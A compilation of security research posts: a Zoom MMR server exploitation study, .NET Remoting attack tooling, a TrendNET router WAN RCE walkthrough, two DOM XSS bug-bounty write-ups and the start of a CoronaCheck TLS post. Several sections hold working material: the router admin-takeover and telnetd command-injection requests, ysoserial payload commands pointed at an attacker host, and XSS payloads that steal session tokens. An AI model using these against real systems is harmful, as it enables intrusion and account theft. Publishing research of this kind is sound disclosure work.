The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

.NET Remoting Revisited

27 January 2022 at 14:49

.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.

This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.

If you already understand the internal of .NET Remoting, you may skip the introduction and proceed right with Security Features, Pitfalls, and Bypasses.

Introduction

.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.

Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:

var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(MyRemotingClass),
    "MyRemotingClass"
);

Then a client just needs the URL of the registered service to do remoting with the server:

var remote = (MyRemotingClass)RemotingServices.Connect(
    typeof(MyRemotingClass),
    "tcp://remoting-server:12345/MyRemotingClass"
);

With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.

And although .NET Remoting has already been deprecated with the release of .NET Framework 3.0 in 2009 and is no longer available on .NET Core and .NET 5+, it is still around, even in contemporary enterprise level software products.

Remoting Internals

If you are interested in how .NET Remoting works under the hood, here are some insights.

In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.

On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.

Channel Sinks

When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:

  • HttpServerChannel:
    HttpServerTransportSinkSdlChannelSinkSoapServerFormatterSinkBinaryServerFormatterSinkDispatchChannelSink
  • IpcServerChannel:
    IpcServerTransportSinkBinaryServerFormatterSinkSoapServerFormatterSinkDispatchChannelSink
  • TcpServerChannel:
    TcpServerTransportSinkBinaryServerFormatterSinkSoapServerFormatterSinkDispatchChannelSink

On the client side, the sink chain looks similar but in reversed order, so first a formatter sink and finally the transport sink:

Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.

Passing Parameters and Return Values

Parameter values and return values can be transfered in two ways:

  • by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
  • by reference: if type extends MarshalByRefObject (cf. Type.IsMarshalByRef)

In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server's registry and return a ObjRef instance that holds the URL and type information of the marshaled object.

The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows to customize serialization/deserialization of specified types.

In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogate.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls the RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means, every remoting object extending MarshalByRefObject is substituted with a ObjRef and thus passed by reference instead of by value.

On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.

That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.

With this knowledge in mind, it should be easier to follow the rest of this post.

Previous Work

Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw:

We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.

Security Features, Pitfalls, and Bypasses

The .NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:

HTTP Channel IPC Channel TCP Channel
Authentication n/a n/a
  • secure=bool channel property
  • ISecurableChannel.IsSecured (via NegotiateStream; default: false)
Authorization n/a
  • authorizationGroups=Windows/AD Group channel property (default: thread owner is allowed, NT Authority\Network group (SID S-1-5-2) is denied)
  • CommonSecurityDescriptor passed to a IpcServerChannel constructor
custom IAuthorizeRemotingConnection class
  • authorizationModule channel property
  • passed to TcpServerChannel constructor
Impersonation n/a impersonate=bool (default: false) impersonate=bool (default: false)
Conf., Int., Auth. Protection n/a n/a protectionLevel={None, Sign, EncryptAndSign} channel property
Interface Binding n/a n/a rejectRemoteRequests=bool (loopback only, default: false), bindTo=address (specific IP address, default: n/a)

Pitfalls and important notes on these security features:

HTTP Channel
  • No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
  • By default, access to named pipes created by the IPC server channel are denied to NT Authority\Network group (SID S-1-5-2), i. e., they are only accessible from the same machine. However, by using authorizationGroup, the network restriction is not in place so that the group that is allowed to access the named pipe may also do it remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
  • With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to logon with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).

ExploitRemotingService Explained

James Forshaw also released ExploitRemotingService, which contains a tool for attacking .NET Remoting services via IPC/TCP by the various attack techniques. We'll try to explain them here.

There are basically two attack modes:

raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all others commands (see -h)
Write a FakeAsm assembly to the server's file system, load a type from it to register it at the server to be accessible via the existing .NET Remoting channel. It is then accessible via .NET Remoting and can perform various commands.

To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:

without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This allows to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which gets called by the victim server on the attacker's server remotely. As for the key, a FileInfo/DirectoryInfo object is wrapped in SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with an MarshalByRefObject object as parameter to make the server call the IConvertible.ToType(Type, IformatProvider) on an object of the attacker's server, which then can deliver the deserialization payload.

Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overriden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref to ExploitRemotingService (see also Community Contributions further below):

--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IformatProvider) on the proxy, which sends a remoting call to the attacker's server.

Security Measures and Troubleshooting

If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:

Error Reason ExampleRemotingService Options ExploitRemotingService Bypass Options
"Requested Service not found" The URI of an existing remoting service must be known; there is no way to iterate them. n/a --nulluri may work if remoting service has not been servicing any requests yet.
NotSupportedException with link to KB 390633 Disallow received IMessage being MarshalByRefObject (see AppSettings.AllowTransparentProxyMessage) -d --uselease, --useobjref
SecurityException with PermissionSet info Code Access Security (CAS) restricted permissions in place (TypeFilterLevel.Low) -t low --uselease, --useobjref

Community Contributions

Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.

ExploitRemotingService

The ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to ExploitRemotingService that we think are worthwhile:

--useobjref option
This newly added option allows to use the ObjRef trick described
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers that and avoids trying to load it again. That means, writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is to find the proper location to write the assembly to where it will be searched by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService to use the --remname to name the FakeAsm assembly so that it is possible to have multiple attempts of writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.

YSoSerial.Net

The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.

RogueRemotingServer

The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.

Example of ObjRef Gadget and RogueRemotingServer

Here is an example of how these tools can be used together:

# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe
  > MSPaint.soap

# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t

During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.

Conclusion

.NET Remoting has already been deprecated long time ago for obvious reasons. If you are a developer, don't use it and migrate from .NET Remoting to WCF.

If you have detected a .NET Remoting service and want to exploit it, we'll recommend the excellent ExploitRemotingService by James Forshaw that works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try it with the enhancements added to our fork of ExploitRemotingService, especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters since the message could be sent from any attacker-controled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production”, window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com. This URL would then be used in a POST request. The response would be parsed as a JSON and set window.settingsSync. Next, window.settingsSync.versionNumber was used to construct a URL that loaded a new JavaScript file var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled domain served a malicious payload to the POST request.

Diagram 1

I created malicious.php on my server to send a valid response by capturing the responses from the origin target. I modified the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": “a;alert()//“,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to login to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

When dynamic HTTP requests are made, they adhere to the connect-src CSP rule. In this case, the default-src rule meant that only requests to *.companyb.com and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.

I quickly hosted a JSON file with text as <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/oauth_data.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2f payload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP for script-src only allowed for self or *.companyb.com for HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validate if the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

By using this bypass to create an open redirect, I saved my final XSS payload in <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with src pointing to the open redirect which passed the CSP but eventually redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is refered to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

